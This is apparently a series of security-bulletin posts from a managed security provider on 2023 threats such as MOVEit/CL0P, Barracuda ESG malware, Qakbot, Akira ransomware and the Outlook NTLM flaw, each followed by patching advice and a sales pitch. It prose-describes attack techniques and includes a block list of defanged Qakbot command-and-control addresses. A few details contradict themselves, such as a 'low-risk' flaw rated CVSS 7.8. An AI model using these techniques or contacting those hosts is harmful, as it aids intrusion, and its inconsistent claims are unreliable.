CL0P revealed they had breached the servers of “hundreds of companies,” including the largest US pension fund, Calpers, and insurer Genworth Financial. Hackers were led to both organizations via a path provided by a third-party vendor, PBI Research Services. Concerning those attacks and others, by late June, the number of MOVEit hack victims grew by several million.

In previous CL0P attacks, the group emailed their extortion demands to company executives.

 

Extortion email sent by CL0P during Accellion attacks.

 

But, with those affected by the MOVEit Transfer attacks, CL0P is taking a different approach. Instead of demanding ransom, CL0P wants affected organizations to contact them if they desire to negotiate a ransom.

The CL0P Ransomware Group

According to a joint Cybersecurity Advisory from CISA, open source information indicates CL0P (also known as TA505) began exploiting the previously unknown SQL injection vulnerability (CVE-2023-34362) vulnerability on May 27, 2023. This took place in Progress Software’s managed file transfer (MFT) solution known as  MOVEit transfer. Once exploited, the group infected MOVEit Transfer’s internet-facing web applications with a web shell named LEMURLOOT. This was then leveraged to steal data from underlying MOVEit Transfer databases.

The CL0P ransomware group has shown a common tactic of working on holidays. This is significant because holidays are typically associated with fewer staff members on the clock. Meaning holidays are an opportune time to attack without getting caught.

How to Defend Against Ransomware

If you become a victim of ransomware and/or extortion, experts strongly advise you never to pay for your data back. If your data is stored in an encrypted location, it will make it more difficult for the threat actor to view and use it against you. Additionally, paying will encourage the attackers, and others like them, to do it again.

In summary, organizations need to protect their most crucial assets. While there is no fool-proof way to eliminate all cyber risks, you can mitigate most with basic security initiatives. Options include maintaining a patch schedule and regularly completing vulnerability assessments.

If your organization could use assistance implementing cybersecurity or managing cyber risk, consider partnering with a cybersecurity company like M.A. Polce. As a managed security services provider (MSSP) with industry-leading Managed Detection and Response capabilities, we can help protect your organization from cyber threats like ransomware. You can contact us today to discuss your needs.

Overview – Custom Malware Infects Barracuda ESG

Using a zero-day vulnerability from 2022, threat actors have been infecting Barracuda’s Email Security Gateway (ESG) with custom malware. Barracuda Networks, a popular email security appliance installed in over 200,000 organizations around the world, released an update to patch the zero-day. However, the fix comes after at least seven months after threat actors began exploiting the vulnerability. During this time, cybercriminals were able to backdoor customers through the ESG.

History of the Barracuda ESG Zero-Day

The bug, tracked as CVE-2023-2868, was part of an ongoing investigation initiated by Barracuda back in October 2022. The investigation shows that threat actors were able to gain access to a “subset of ESG appliances.” Then, deploy backdoors to provide attackers with persistent access to the compromised systems, as well as stolen information from the ESG appliances.

Initially, the security flaw was discovered on May 19th, the day after Mandiant, a cybersecurity firm, began digging into the suspicious activity. Then on May 20th, Barracuda released and applied a patch to all ESG appliances. The patch blocks the attackers’ access to the compromised devices using a dedicated script. On May 24th, Barracuda warned customers that their ESG appliances might have been breached using the now-patched zero-day bug. The warning advised customers to investigate their environment to ensure that no threat actors were moving laterally throughout the network.

Custom Malware Used in ESG Zero-Day Attacks

As mentioned, these attacks involve the use of custom malware. The first custom malware, named Saltwater, is a trojanized Barracuda SMTP daemon (bsmtpd) module that enables attackers to backdoor through infected appliances. Additionally, Saltwater can execute commands on compromised devices, transfer files, and proxy/tunnel the attacker’s malicious traffic to avoid detection.

The second malware strain found during the investigation of this attack is called SeaSpy, which activates using “magic packets”. This malware helps monitor port 25 (SMTP) traffic, and some of its code overlaps with the publicly available cdoor passive backdoor features. SeaSpy also establishes reverse shells via SMTP HELO/EHLO commands sent via the malware’s command-and-control C2 server. Any indicators of compromise (IOCs) can be found on Barracuda’s website.

What Should Barracuda ESG Users Do to Stay Secure?

In summary, we advise users of Barracuda Email Security Gateway appliances to check if their ESG appliances are up-to-date. And, of equal importance, stop using the breached appliances. And users with affected devices should request a new virtual or hardware appliance, rotate credentials linked to hacked appliances, and check network logs for IOCs and connections from unknown IP addresses. Barracuda notes that impacted users have been notified of actions to take via the ESG. As for maintaining patches in the future, we recommend staying current on vendor communications as they relate to applications within your environment.

A Solution to Managing Your Organization’s Security

As cyber threats become more complex and frequent, it’s crucial for organizations to prioritize cybersecurity. However, limited resources often make it difficult for small and medium-sized organizations (SMBs) to effectively manage their security. That’s why partnering with a Managed Security Service Provider (MSSP) like M.A. Polce can be a strategic business initiative for SMBs. MSSPs have the expertise and resources to handle critical security practices, such as patch management and network monitoring. By outsourcing these tasks, organizations can focus on their core business objectives while ensuring their security posture is strong and up-to-date. If your organization could use assistance managing its cybersecurity, contact us today. We’ll evaluate your needs and customize a solution that fulfills them.

Sources

https://www.barracuda.com/company/legal/esg-vulnerability#:~:text=the%20section%20below.-,Endpoint%20IOCs,-Table%204%20lists – Barracuda’s IOC’s released
https://www.securityweek.com/barracuda-zero-day-exploited-to-deliver-malware-for-months-before-discovery/
https://www.bleepingcomputer.com/news/security/barracuda-warns-of-email-gateways-breached-via-zero-day-flaw/
https://www.bleepingcomputer.com/news/security/barracuda-zero-day-abused-since-2022-to-drop-new-malware-steal-data/

Overview of Apple’s Rapid Security Response Update

Last Thursday, Apple released a Rapid Security Response update. Rapid Security Responses are a relatively new type of software release that exists to “deliver important security improvements between software updates.” So, now users get security fixes more frequently to mitigate security risks in real-time.

Apple’s first rapid alert fixes two actively exploited zero-day vulnerabilities in Apple Webkit. Two of the bugs, CVE-2023-28204 and CVE-2023-32373, were reported to the tech company by an anonymous researcher. These flaws can lead to sensitive information disclosure and arbitrary code execution if an attacker tricks a victim into processing specially crafted web content. In other words, first, an attacker must lure their target to a malicious site. Then, once initiated, the attacker gains access to the victim’s device and files and can run other malicious programs to steal their data.

Devices Affected by Apple’s Rapid Security Response Updates

Apple’s security advisory shares that it patched the vulnerabilities with its first Rapid Security Response updates, specifically affecting iOS 16.4.1(a), iPad 16.4.1(a), and macOS 13.3.1(a). The newest updates, iOS 16.5 and iPad 16.5, fix CVE-2023-28204 and CVE-2023-32373, as well as CVE-2023-32409. The latter is a WebKit zero-day, which attackers exploit to escape the Web Content sandbox.

CVE-2023-32409 was reported to Apple by Google’s Threat Analysis Group and Amnesty International. The group’s work indicates that the vulnerability was most likely already exploited by the products of a commercial spyware vendor.

The updates also resolve exploited WebKit vulnerabilities in Apple TV, Apple Watch, and Safari. As for the latest macOS Ventura update, three zero-day bugs and almost 50 other vulnerabilities have been fixed. Many could have led to sensitive information disclosure, arbitrary code execution, DoS attacks, a security feature bypass, and privilege escalation.

Summary of Apple’s Rapid Security Response Updates

Fortunately, Apple’s latest Rapid Security Response update patches over thirty additional vulnerabilities. Several which lead to security bypass, sandbox escape, arbitrary code, exposure of location and other user data, privilege escalation, termination of an application, recovery of deleted photos, retaining access to system configuration files, contact information exposure from the lock screen, and modifications of protected parts of the file system. The length of this list increases the criticality of updating your Apple device to the latest version if you have not done so already.

How to Prevent Exploitation of Apple Device Vulnerabilities

It is always essential to install new updates for your devices upon release. This is especially true for Rapid Security Response updates. That said, turning on automatic updates is an excellent way to stay on top of it. This way, updates can be installed automatically without manual effort while you sleep.

Steps to Update Your Apple Devices

How to Set Automatic Updates on an iPhone or iPad

Go to Settings > General > Software Update > Automatic Updates, then turn on “Security Responses & System Files.”

How to Set Automatic Updates on a Mac

Choose Apple menu  > System Settings. Click General in the sidebar, then click Software Update on the right. Click the Show Details button next to Automatic Updates. Then turn on “Install Security Responses and system files.”

Managed Cybersecurity Services to Secure Your Organization

If your organization needs help managing device security or its overall security posture, contact us about our managed security services today. We specialize in cybersecurity and risk management services for small to medium-sized businesses and public entities across New York State. As a leading provider of IT security solutions in the area, we provide exceptional support, customizable solutions, and the assurance of a trusted technology partner.

Sources

https://www.securityweek.com/apple-patches-3-exploited-webkit-zero-day-vulnerabilities/
https://www.securityweek.com/apple-patches-actively-exploited-webkit-zero-day-vulnerability/
https://support.apple.com/en-us/HT201224 – Apple’s Update on Rapid Security Response Update

Overview of .zip Top-Level Domain Cyber Threat

At the beginning of May, Google introduced eight new top-level domains (TLD) available for purchase for websites and email addresses, including .zip. A top-level domain is the first stop after the root zone. Or, in other words, it is anything following the final period in a URL. In this case, think of .com, .edu, or .org. Recent observations of malicious use of the .zip TDL have raised concern among cybersecurity experts.

The concern involves the fact that the .zip domain looks similar to a popular file extension, .zip. The similarity to the popular file extension .zip means that messaging platforms and social media sites can convert file names with .zip extensions into URLs. This creates an issue because URLs are often used for downloading files, and with the introduction of the .zip domain, clicking the link can lead to malware downloads.

Malicious use of the .zip top-level domain is already active in the wild. In one instance, a phishing page disguised as a file with the domain “microsoft-office[.]zip” attempts to steal Microsoft Account credentials.

Example of phishing with the .zip Top-Level Domain

Theoretically, a threat actor can purchase a .zip domain with the same name as a commonly used filename, such as “update.zip.” Then, the attacker can deploy the .zip domain in a targeted phishing email. When clicked, it redirects an unsuspecting victim to a malware download instead of the update they intended to install.

How to Protect Against New .zip TDL Threats

At this time, the best way users can protect against this threat is through awareness. For this reason, experts recommend providing employees with security awareness training. Quality cyber awareness training programs entail simulated phishing campaigns that test employees with what could be real-life situations. Because these activities familiarize employees with realistic cyber threats, it’s an effective way to prevent cyber incidents within an organization.

Another option is to put a related security control in place. Experts highly recommended assessing the need for allowing access to .zip domains within your organization. For example, suppose your organization does not have a business need for accessing or using these new TLDs. In that case, they should be blocked at the Network Firewall, DNS, or Web Proxy level and allowlist domains as needed.

Cybersecurity threats are constantly evolving. This makes it vital to maintain awareness of the cyber landscape so you can take prompt and effective actions to secure your environment. If your organization needs assistance managing its cybersecurity, contact us today. We offer comprehensive managed cybersecurity services for small and medium-sized businesses to help them assess, strengthen, and actively defend their cyber posture.

Sources

https://www.blog.google/products/registry/8-new-top-level-domains-for-dads-grads-tech/mkt_tok=ODQwLU9TUS02NjEAAAGLzgeyuAmWchQ72Th00AAWHqcO-6BeDxzPbER8v16zgMiym4ZUeTNiEoFORxxhRKh4QN5IKfRGOlWV8_1TiIgUC5oX2ihUVAchzFWqNlCObiO5kwhttps://www.bleepingcomputer.com/news/security/new-zip-domains-spark-debate-among-cybersecurity-experts/Arctic Wolf Security Bulletin (email)

Overview of Cisco Critical Switch Bugs

A recent Cisco security advisory warns customers of four new bugs affecting multiple Small Business Series Switches. These vulnerabilities can perform critical remote code execution with public exploit code. Additionally, all four vulnerabilities have CVSS base scores of 9.8 out of 10, making them critical. The successful exploitation of these vulnerabilities allows unauthenticated attackers to execute arbitrary code with root privileges on the compromised device.

Details on Cisco Critical Switch Bugs

Tracked as CVE-2023-20159, CVE-2023-20160, CVE-2023-20161, and CVE-2023-20189, all are caused by improper validation of requests sent to the targeted switches’ web interface. An attacker can exploit these vulnerabilities through maliciously created requests sent through the victim’s devices’ web-based user interfaces. These are low-complexity attacks that don’t require the user’s interaction.

While there are no workarounds to address these vulnerabilities, Cisco has released free software updates for them.

Cisco explained that the vulnerabilities are not dependent on one another. In other words, the exploitation of one of the vulnerabilities is not required to exploit the other. Also, a software release affected by one of the vulnerabilities may not be affected by the others.

Cisco Small Business Switches Affected by Critical Bug

  • 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches, and 550X Series Stackable Managed Switches (fixed in firmware version 2.5.9.16)
  • Business 250 Series Smart Switches and Business 350 Series Managed Switches (fixed in firmware version 3.3.0.16)
  • Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches, Small Business 500 Series Stackable Managed Switches (no patch available at the moment)

 
For the last bullet above, no patch is available for the affected devices since these have all entered the end-of-life process.

Cisco’s Product Security Incident Response Team revealed proof-of-concept exploit code is available for the security vulnerabilities. Consequently, it could lead to active exploitation if a threat actor were motivated enough to create their own and target the vulnerable devices.

Cisco Products Confirmed Not Vulnerable

  • 220 Series Smart Switches
  • Business 220 Series Smart Switches

 

The Importance of Patching  Device Vulnerabilities

Staying on top of vulnerabilities and patches for all devices in your organization is crucial. After all, ignoring this can lead to security breaches with dire consequences for individuals and the company. Hackers are constantly finding new ways to exploit weaknesses in technology, so it’s important to stay informed and protect your devices. By and large, regularly updating and patching devices significantly reduces the risk of a security breach and keeps your data safe. For this reason, we encourage you to be proactive and vigilant about device security to ensure a safer digital world.

If you struggle to keep up with the latest vulnerabilities and patches for devices in your organization, consider partnering with a managed security service provider (MSSP) like M.A. Polce. Partnering with an MSSP can take the burden off your shoulders and ensure your devices are always up-to-date and secure. Our experts stay informed on the latest security threats and have the tools to patch any vulnerabilities quickly. Being proactive about device security can help create a safer digital world. Contact M.A. Polce today to learn more about how they can assist with your patch management needs.

Sources

https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-switch-bugs-with-public-exploit-code/
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sg-web-multi-S9g4Nkgv – Cisco’s Update
https://www.cisco.com/c/en/us/products/collateral/switches/small-business-smart-switches/eos-eol-notice-c51-740541.html – Cisco’s End of Life Release

 

 

Overview of Patch Tuesday’s Sysmon Vulnerability

During Microsoft’s latest Patch Tuesday, the company released a security advisory describing a Local Privilege Escalation vulnerability within Sysmon. An independent security researcher discovered the vulnerability and then released it to Microsoft. While it’s currently a low-risk vulnerability, Microsoft has released Sysmon version 14.16 to fix the flaw that users should install.

Sysmon Vulnerability Details

This vulnerability exists due to the application improperly imposing security restrictions in SysInternals Sysmon for Windows. As a result, threat actors can bypass security restrictions and privilege escalation within the environment. Instead of acting as an initial gateway into the system, experts expect malicious actors to leverage the vulnerability to escape any privileges on the already compromised system.

As mentioned, this is a low-risk vulnerability. Its CVSS scale rating is 7.8, with a likelihood of exploitation. Due to the lack of publicly available proof-of-concept exploits, Microsoft recommends upgrading your devices to the latest available version of Sysmon. This version, Sysmon 14.16, should be added to your next patching schedule to minimize the chances of local privilege escalation.

In order to perform the Sysmon update, please see the Sysmon Installation guide provided by Arctic Wolf here.

How to Protect Your Organization from Cyber Vulnerabilities

As always, it’s important to pay attention to new vulnerabilities and potential risks within your environment so you can take the necessary mitigation steps. This is especially true for zero days, which can be found on Patch Tuesdays. Additionally, performing updates and maintaining a sense of urgency when dealing with vulnerabilities will ensure you and your organization are protected in the long run.

If your organization needs assistance managing its cyber risk, consider partnering with a managed cybersecurity service provider (MSSP) like M.A. Polce. We offer customizable cybersecurity services that actively defend your network from cyber threats and managed risk and compliance services to help you assess and strengthen your security posture. Contact us to learn more about our cybersecurity solutions for businesses.

Sources

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29343 – Microsoft Updates
https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon – Sysmon Download
https://arcticwolf.com/resources/blog/cve-2023-29343-sysmon-local-privilege-escalation-vulnerability/
– Arctic Wolf blog

Overview of Recent Qakbot Malware Attacks

Sources confirm a recent increase in Qakbot Malware attacks used for initial access to achieve a foothold in environments. Over the last decade, Qakbot built a name for itself as one of the deadliest trojans in the wild. At first, it originated as a Banking Trojan in 2007.  But, Qakbot (also known as QBot, QuackBot, and Pinkslipbot) continues to evolve with new techniques and capabilities.

There are several attack vectors through which QBot infects victims. Phishing emails distribute QBot, and once in a network, it self-propagates and steals sensitive data. It commonly uses remote code execution, which enables threat actors to perform manual attacks to achieve secondary objectives, including scanning the compromised network or injecting ransomware.

In QBot’s latest iteration, sources report that it is leveraging compromised trusted websites of small businesses to bypass email link scanning services to serve the malware after phishing users via email. Then, unsuspecting victims download a zip file containing Windows Script Files (.wsf) or JavaScript (.js) files that load the Qakbot malware. Observations show the loader also doing typical injection into wermgr.exe to call out to command and control. After initial access, a threat actor can access and reach out to other machines using rundll32.exe to callout via cobalt strike beacons on https.

How to Protect Against Qakbot Malware

In order to mitigate the threat of Qakbot Malware, be aware of zip archives that contain JavaScript or Windows Script Files disguised as invoices or other documents. Also, it is critical to block the Indicators of Compromise (IoC) associated with Qakbot within the DNS of your firewall. These Qakbot servers have been listening for the connection of remote port 65400.

The following table lists the IP addresses and DNS to block to mitigate the Qakbot threat:

IP Address DNS
172.107.98[.]3 unassigned.psychz[.]net
23.111.114[.]52 N/A
94.103.85[.]86 v1785516.hosted-by-vdsina[.]ru
99.228.131[.]116 cpef02f74c848b8-cm30b7d4b9e4d0.sdns.net.rogers[.]com
47.205.25[.]170 N/A
79.47.207[.]6 host-79-47-207-6.retail.telecomitalia[.]it

Other Mitigations for Qakbot Malware Attacks:

  • Disabling the Windows Script host (wscript.exe) if not used by the software on the machine
  • Blocking outbound communication to remote port 65400 via the firewall
  • Geoblocking via the firewall for outbound connections (which may interfere with software)

 

Cybersecurity Services to Protect Against Malware

M.A. Polce is an IT and cybersecurity company in New York that specializes in providing comprehensive, customizable cybersecurity services. We protect businesses from cyber threats like QBot Malware using a combination of human expertise and advanced technologies. So, if your organization needs assistance managing the security of its IT, contact us today to learn about our managed cybersecurity services. 

Sources

Blackpoint Cyber’s Cyber Threat Notice

https://www.digitaljournal.com/tech-science/new-cyberthreat-in-the-horizon-qakbot-malware/article

https://www.galvnews.com/news_ap/business/april-2023-s-most-wanted-malware-qbot-launches-substantial-malspam-campaign-and-mirai-makes/article_3365bf68-1e4f-5c40-bdbe-f94a6d4e8a5b.html

https://informationsecuritybuzz.com/abb-struck-black-basta-ransomware/

https://www.cyber.nj.gov/alerts-advisories/2023-q1-qbot-trend-analysis

https://www.datto.com/blog/qbot-malware-what-is-it-and-how-does-it-work

Overview of Akira Ransomware

A new ransomware operation named Akira has generated a list of victims in different industries, such as education, finance, real estate, manufacturing, and consulting. In two months since its launch, Akira claims attacks on at least sixteen companies and counting, according to BleepingComputer. The operation’s primary focus is to breach corporate networks worldwide, encrypt the files, and demand millions of dollars in ransom.

Due to code differences, experts believe that this new Akira operation is unrelated to a former ransomware strain with the same name active in 2017.

How Akira Ransomware Works

Akira has a simple technique that can easily take down a company or organization by encrypting its files. Akira Ransomware runs a PowerShell command and deletes Windows Shadow Volume Copies on the device. Once the command is successfully run, the ransomware starts to encrypt files on the device of over 150 different file extensions. During the encryption process, it passes over any files found in the Recycle Bin, System Volume Information Boot, ProgramData, and Windows folders. It also skips encryption on files ending in .exe, .lnk, .dll, .msi, and .sys. When successfully encrypted, the files show with the extension.akira at the end of the file name, similar to “example.doc.akira” or “example.jpg.akira.”

Akira also takes advantage of the Windows Restart Manager API to shut down Windows services or close out processes that keep a file open, forcing the file to be overpowered and encrypted. Each computer folder contains a ransom note left by Akira, named “akira_readme.txt”, which includes information on how the files were taken over and encrypted, along with links to the Akira data leak site and a site where negotiations take place to pay the ransom. Each victim has a unique negotiation password that can be entered into Akira’s Tor site on the dark web. This leads the victim to a chat system where they can negotiate with the ransomware group.

A sample ransom note on the Akira Ransomware group's data leak website.

Akira Ransom Note on Data Leak Site. Source: BleepingComputer

How and Why Akira Steals Corporate Data

Once it successfully breaches a network, Akira takes advantage of the compromised organization. It does this by spreading laterally to other devices within the organization. Once Akira gains the Windows domain admin credentials to the organization, the group deploys ransomware throughout the network. But not before they steal corporate data for leverage. Akira uses the stolen data to extort the company. In other words, the group teases the victim with threats to release the information publicly if a ransom is not negotiated and paid.

Akira has successfully leaked the data of four victims on its personal data leak site. The leaks contain data ranging from 5.9 GB to 259 GB. Meanwhile, ransom demands range from $200,000 to a few million dollars. However, in some cases, companies don’t need their files decrypted. Instead, they solely want to protect the confidentiality of their information. In instances where decryption isn’t needed, ransom demands have been lowered but not completely removed. Any weaknesses are being monitored for Akira Ransomware at the moment as it is relatively new.

How to Protect Your Organization from Akira Ransomware

You can help protect your organization from Akira Ransomware similarly to how you would from other cyber threats. A few basic best cybersecurity practices include:

  • Practicing good IT hygiene
  • Backup your data on a regular basis
  • Invest in Security Awareness Training for yourself and your employees
  • Ensure applications, software, and appliances are up to date/patched

 
As a Managed Security Service Provider (MSSP) in New York State, M.A. Polce specializes in providing comprehensive, customizable cybersecurity services to protect businesses from cyber threats like Akira Ransomware. If your organization needs assistance managing IT security, contact us today.

Sources

https://www.bleepingcomputer.com/news/security/meet-akira-a-new-ransomware-operation-targeting-the-enterprise/ – See the Example Ransom note here.https://thecyberexpress.com/mcgregor-cyber-attack-akira-ransomware-group/https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/

Overview – Attacks on TBK Vision’s DVR Vulnerability

Last month, there was a massive surge in malicious attacks targeting a five-year-old vulnerability in TBK Vision’s DVR Camera System. A Digital Video Recording (DVR) device is the central part of a security surveillance system because, without it, one would be unable to review the recorded footage. DVR servers store sensitive security footage and are typically located on the company’s internal network to prevent unauthorized users from accessing the footage.

The vulnerability, CVE-2018-9995, is a high-severity flaw discovered by security researchers at Fortinet. They found that when the camera handles malicious HTTP cookies, it experiences an error. The error enables a remote attacker to bypass the authentication and gain administrative privileges in the form of JSON data. Once this happens, an attacker can view camera footage and video feeds. Additionally, threat actors use a publicly available PoC (proof of concept) exploit to target the specific vulnerability.

Last month, over 50,000 attack attempts on these devices came from unique Intrusion Prevention Systems (IPS) detections. The rise in attacks led Fortinet to recognize the flaw. However, details on the existence of the vulnerability trace back to April 2018. But there was no patch for it, so it has been left wide open and vulnerable.

Banking, retail, government, and other sectors use TBK Vision’s products worldwide. The wide use of these devices and their easy-to-exploit nature makes the vulnerability a popular target for attackers.

Devices Impacted by the TBK DVR Vulnerability

This vulnerability affects the TBK DVR 4104 and TBK DVR 4216 models and any rebrands of this model under the Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR brands.

What to do if You Use Vulnerable TBK DVR Devices

To date, no patch exists to address the flaw. So, replacing the vulnerable devices listed above with a new supported model or isolating them within your environment from the internet to restrict unauthorized access is recommended. As for other devices you may use, the most crucial factor in protecting any device, especially an internet-facing device, is to patch or install updates. The option to auto-update on these devices by default would automatically ensure these devices are in the latest version. If you need help managing the security of your devices, contact us to learn about your options.

Sources

https://tbkvision.com/

https://www.infosecurity-magazine.com/news/high-severity-flaw-tbk-dvr-camera/

https://www.bleepingcomputer.com/news/security/hackers-exploit-5-year-old-unpatched-flaw-in-tbk-dvr-devices/

https://www.securityweek.com/exploitation-of-5-year-old-tbk-dvr-vulnerability-spikes/

https://nvd.nist.gov/vuln/detail/CVE-2018-9995

Overview – New Security Updates for VMware Products

A recent VMware announcement contains security updates for various flaws found in the company’s products. The security vulnerabilities impact VMware Workstation Pro/Payer and VMware Fusion products. All flaws were privately reported to VMware.

VMware Zero-Day Security Updates

Two of these flaws are zero-day vulnerabilities known as CVE-2023-20869 and CVE-2023-20870. Initially, they were part of an exploit chain STAR Labs security researchers performed during a hacking contest at Pwn2Own Vancouver 2023. The vulnerabilities allow attackers to gain code execution systems running unpatched versions of VMware Workstation and VMware Fusion software hypervisors.

The first of the two, CVE-2023-20869, is a stack-based buffer overflow vulnerability within any Bluetooth device-sharing functionality that allows a local attacker to execute code as the VMware VMX process runs.

Following, there is CVE-2023-20870. CVE-2023-20870 is an information disclosure weakness within the Bluetooth device-sharing functionality within the VM. So, it enables malicious attackers to read any privileged information within the hypervisor memory of the VM. To remove the attack vector for these two vulnerabilities, you can turn off the Bluetooth support on the VM by unchecking the “Share Bluetooth devices with the virtual machine” option on any impacted device.

Other VMware Product Updates

Additionally, VMware’s announcement addresses two more security flaws affecting VMware Workstation and Fusions-hosted hypervisors.

One of these flaws, CVE-2023-20871, is a high-severity VMware Fusion Raw Disk vulnerability. It enables attackers with read/write access to the host operating system to use the flaw’s local privilege escalation capabilities to gain root access to the host OS.

Finally, the last of the four bugs is CVE-2023-20872. This out-of-bounds read/write vulnerability in the SCSI CD/DVD device emulation impacts both VMware Workstation and VMware Fusion products. In this case, the bug can temporarily block exploitative functions. It does this by requiring admins to remove the CD/DVD device from the virtual machine or by configuring the virtual machine not to use a virtual SCSI controller.

At this time, there are no complete fixes for these four vulnerabilities, just temporary workarounds. However, staying current on patches and the most recent versions of all devices, software, and applications is crucial.

Click here for instructions for turning off Bluetooth functions on VMware Workstation Pro, Workstation Player, and VMware Fusion.

For instructions on removing the CD/DVD device or configuring the VM to not use a virtual SCSI controller for VMware Workstation and Fusion, click here.

As a Managed Service Provider (MSP) and Managed Security Service Provider (MSSP), we specialize in providing customizable IT solutions and cybersecurity services for businesses in New York State. So, if you need assistance maintaining the security of your IT infrastructure, contact us today.

Sources

https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-zero-day-exploit-chain-used-at-pwn2own/

https://www.vmware.com/security/advisories/VMSA-2023-0008.html

https://www.helpnetsecurity.com/2023/04/26/cve-2023-20869-cve-2023-20870/

Overview – Malware Targets EDR & MDR Software

EDR and MDR tools have become a massive part of detecting, responding to, and monitoring cyber threats and stopping attacks. Endpoint Detection & Response (EDR) and Managed Detection & Response (MDR) are tools deployed on a device to protect a particular endpoint and provide security monitoring and management across an organization’s entire IT environment.

New AuKill Malware

However, recently threat actors have been using a new hacking tool called AuKill which can disable the EDR software on a target’s system before deploying any backdoors or ransomware. This process occurs in Bring Your Own Vulnerable Driver (BYOVD) attacks. Within these attacks, the malicious actors release legitimate drivers signed with a valid certificate capable of running kernel privileges on the victim’s device. This disables the security EDR solution and takes over the system. This type of attack ranges from all kinds of threat actors, ranging from state-backed hacking groups to ransomware groups motivated by money.

How AuKill Malware Disables Security Software

Sophos X-Ops security was the one who discovered the AuKill malware. They found that AuKill drops a vulnerable Windows driver (procexp.sys) next to the one used by Microsoft’s Process Explorer v16.32. This common and legitimate utility can collect information on active Windows processes. Then, it moves to disable the EDR software. To do this, AuKill starts several threads to check and disable the security services and prevent them from restarting to avoid detection. See the articles below for more information on the exact processes AuKill takes to stop an EDR solution.

While there are no set remediations at the moment, the following can help protect against a future attack:

  1. Firstly, if you have an EDR security service in place, it is recommended to enable tamper protection for this agent to prevent any unwanted processes related to its ability to run.
  2. Also, ensure the separation of users and admin privileges is in place to prevent privilege escalation attacks.
  3. Stay up to date on patches, maintaining the latest version of a device, applications, and tools within the system.
  4. Maintain vulnerability management within your environment to detect any flaws.

 

Sources

https://www.bleepingcomputer.com/news/security/ransomware-gangs-abuse-process-explorer-driver-to-kill-security-software/

https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/

Overview of the QNAP Zero-Days

Several QNAP (Quality Network Appliance Provider) Operating Systems for Network Attached Storage (NAS) zero-day vulnerabilities have been discovered and are now impacting over 80,000 devices. These were discovered as zero-day vulnerabilities and are still unpatched for two of the four affected Operating Systems. QNAP is responsible for providing network-attached storage appliances used for sharing files, storage management and surveillance applications, and virtualization. Basically, QNAP is the spot to back up all of your important files, photos, media, and music, an overall storage hub.

The vulnerabilities can be traced through CVE-2022-27597 and CVE-2022-27598, which are memory access violations that could cause unstable code and provide a patch for an authenticated cybercriminal to execute arbitrary code. If these are exploited, the vulnerability allows remote authenticated users to get secret values.

These vulnerabilities affect the QTS, QuTS hero, QuTScloud, and QVP OS. It appears QNAP has released fixed versions in QTS version 5.0.1.2346 build 20230322 and later, and the QuTS hero version h5.0.1.2348 build 20230324 and later. Unfortunately, both the QuTScloud and QVP OS remain unpatched, but QNAP is working on a fix for these flaws.

If your device is affected, you can secure it by regularly updating your system to the latest version, which is a common best practice used for many appliances and software versions. If these vulnerabilities have impacted your device, follow the steps below to update or visit the QNAP website for more information.

How to update your QTS, QuTS hero, or QuTScloud device:

  1. First, log in to QTS, QuTS hero, or QuTScloud as an administrator.
  2. Then, go to Control Panel > System > Firmware Update.
  3. Finally, under Live Update, click Check for Updates. This will automatically choose the latest version and install it. You can also download the update from the QNAP website. Go to Support > Download Center and perform a manual update for your device.

How to update your QVP (QVP Pro Appliances):

  1. First, log in to QVP as an administrator.
  2. Then, go to Control Panel > System Settings > Firmware Update.
  3. Next, select the Firmware Update tab.
  4. After, click Browse to upload the latest firmware file.
  5. Lastly, click Update System to install the update. (You can also download the latest firmware file for your specific device from https://qnap.com/go/download.)

If your organization could benefit from managed security services to help keep your network and devices secure, consider speaking with an expert at M.A. Polce for help. As a managed service provider (MSP) and managed security service provider (MSSP), we specialize in a wide range of services, including IT support, network security, professional IT services, cyber risk management & compliance, consulting, and more. Contact us today to learn more about how we can assist your organization.

Sources

https://www.qnap.com/en-us/security-advisory/qsa-23-06

https://www.qnap.com/en-us/security-advisories?ref=security_advisory_details

https://www.darkreading.com/vulnerabilities-threats/qnap-zero-days-80k-devices-vulnerable-cyberattack

Overview

Microsoft has released a new critical vulnerability, scoring a 9.8 out of a maximum of 10 on the CVSS chart. The vulnerability, CVE-2023-23397, is an Elevation of Privilege (EoP) vulnerability in Microsoft Outlook. It gets triggered by an attacker who sends a message with an extended property with a UNC file path to an SMB (port 445) share on a server controlled by a threat actor. The malicious code steals the NTLM hash, which contains the Windows user’s account password, and uses it to escalate through the account.

Unlike many email-based attacks, this attack’s success does not depend on the recipient’s actions once the malicious email hits their inbox. No action is needed because this specific vulnerability triggers on the email server side. This means the exploit occurs before a victim ever sees the malicious content. In other words, without clicking or even reading the email, the attack will commence.

CVE-2023-23397 affects the 32-bit and 64-bit versions of Microsoft 365 Apps for Enterprise Office 2013, 2016, and 2019. Any Microsoft-hosted online services, such as Microsoft 365, are not vulnerable.

Malicious actors have targeted this vulnerability within government, military, energy, and transportation organizations. But, the reach of these attacks will only increase once threat actors realize how simple it is to target and attack someone using this vulnerability.

Recently, Microsoft released a security update to resolve the issue, which you can find in the first link below.

Recommended Action Items for Affected Microsoft Outlook Users:

  • Ensure you have the most up-to-date version of Microsoft running on your device. Microsoft has also recommended that customers disable the WebClient service on their organization’s machines.
  • Blocking TCP Port 445/SMB outbound from your network using a perimeter firewall, local firewall, and through a VPN. Doing so prevents the sending of NTLM authentication messages to remote file shares.

 
Mircosoft’s Patch Tuesday routinely brings unexpected yet pressing news regarding updates and new vulnerabilities. Staying in the loop with these releases will help you stay current on the most recent versions of your applications and prevent your organization from becoming vulnerable to bugs.

Sources

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-outlook-2016-march-14-2023-kb5002254-a2a882e6-adad-477a-b414-b0d96c4d2ce3 – Microsoft Security Update
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23397 – CVE-2023-23397
https://krebsonsecurity.com/2023/03/microsoft-patch-tuesday-march-2023-edition/
